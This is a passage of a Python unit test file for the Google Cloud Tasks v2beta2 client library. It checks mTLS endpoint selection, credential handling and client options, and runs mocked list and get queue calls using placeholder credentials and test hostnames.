from google.cloud.tasks_v2beta2.types import cloudtasks
from google.cloud.tasks_v2beta2.types import queue
from google.cloud.tasks_v2beta2.types import queue as gct_queue
from google.cloud.tasks_v2beta2.types import target
from google.cloud.tasks_v2beta2.types import task
from google.cloud.tasks_v2beta2.types import task as gct_task
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import options_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.oauth2 import service_account
from google.protobuf import any_pb2 # type: ignore
from google.protobuf import duration_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import status_pb2 # type: ignore
from google.type import expr_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert CloudTasksClient._get_default_mtls_endpoint(None) is None
assert (
CloudTasksClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert CloudTasksClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [CloudTasksClient, CloudTasksAsyncClient,])
def test_cloud_tasks_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "cloudtasks.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name",
[
(transports.CloudTasksGrpcTransport, "grpc"),
(transports.CloudTasksGrpcAsyncIOTransport, "grpc_asyncio"),
],
)
def test_cloud_tasks_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [CloudTasksClient, CloudTasksAsyncClient,])
def test_cloud_tasks_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "cloudtasks.googleapis.com:443"
def test_cloud_tasks_client_get_transport_class():
transport = CloudTasksClient.get_transport_class()
available_transports = [
transports.CloudTasksGrpcTransport,
]
assert transport in available_transports
transport = CloudTasksClient.get_transport_class("grpc")
assert transport == transports.CloudTasksGrpcTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
@mock.patch.object(
CloudTasksClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CloudTasksClient)
)
@mock.patch.object(
CloudTasksAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(CloudTasksAsyncClient),
)
def test_cloud_tasks_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(CloudTasksClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(CloudTasksClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc", "true"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
"true",
),
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc", "false"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
"false",
),
],
)
@mock.patch.object(
CloudTasksClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CloudTasksClient)
)
@mock.patch.object(
CloudTasksAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(CloudTasksAsyncClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_cloud_tasks_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class", [CloudTasksClient, CloudTasksAsyncClient])
@mock.patch.object(
CloudTasksClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CloudTasksClient)
)
@mock.patch.object(
CloudTasksAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(CloudTasksAsyncClient),
)
def test_cloud_tasks_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_cloud_tasks_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc", grpc_helpers),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_cloud_tasks_client_client_options_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_cloud_tasks_client_client_options_from_dict():
with mock.patch(
"google.cloud.tasks_v2beta2.services.cloud_tasks.transports.CloudTasksGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = CloudTasksClient(client_options={"api_endpoint": "squid.clam.whelk"})
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc", grpc_helpers),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_cloud_tasks_client_create_channel_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# test that the credentials from file are saved and used as the credentials.
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel"
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
file_creds = ga_credentials.AnonymousCredentials()
load_creds.return_value = (file_creds, None)
adc.return_value = (creds, None)
client = client_class(client_options=options, transport=transport_name)
create_channel.assert_called_with(
"cloudtasks.googleapis.com:443",
credentials=file_creds,
credentials_file=None,
quota_project_id=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=None,
default_host="cloudtasks.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("request_type", [cloudtasks.ListQueuesRequest, dict,])
def test_list_queues(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse(
next_page_token="next_page_token_value",
)
response = client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListQueuesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListQueuesPager)
assert response.next_page_token == "next_page_token_value"
def test_list_queues_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
client.list_queues()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListQueuesRequest()
@pytest.mark.asyncio
async def test_list_queues_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.ListQueuesRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse(next_page_token="next_page_token_value",)
)
response = await client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListQueuesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListQueuesAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_queues_async_from_dict():
await test_list_queues_async(request_type=dict)
def test_list_queues_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListQueuesRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
call.return_value = cloudtasks.ListQueuesResponse()
client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_queues_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListQueuesRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse()
)
await client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_queues_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_queues(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_queues_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_queues(
cloudtasks.ListQueuesRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_queues_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_queues(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_queues_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_queues(
cloudtasks.ListQueuesRequest(), parent="parent_value",
)
def test_list_queues_pager(transport_name: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_queues(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, queue.Queue) for i in results)
def test_list_queues_pages(transport_name: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
pages = list(client.list_queues(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_queues_async_pager():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_queues), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
async_pager = await client.list_queues(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, queue.Queue) for i in responses)
@pytest.mark.asyncio
async def test_list_queues_async_pages():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_queues), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
pages = []
async for page_ in (await client.list_queues(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [cloudtasks.GetQueueRequest, dict,])
def test_get_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
def test_get_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
client.get_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetQueueRequest()
@pytest.mark.asyncio
async def test_get_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.GetQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(name="name_value", state=queue.Queue.State.RUNNING,)
)
response = await client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_get_queue_async_from_dict():
await test_get_queue_async(request_type=dict)
def test_get_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
call.return_value = queue.Queue()
client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
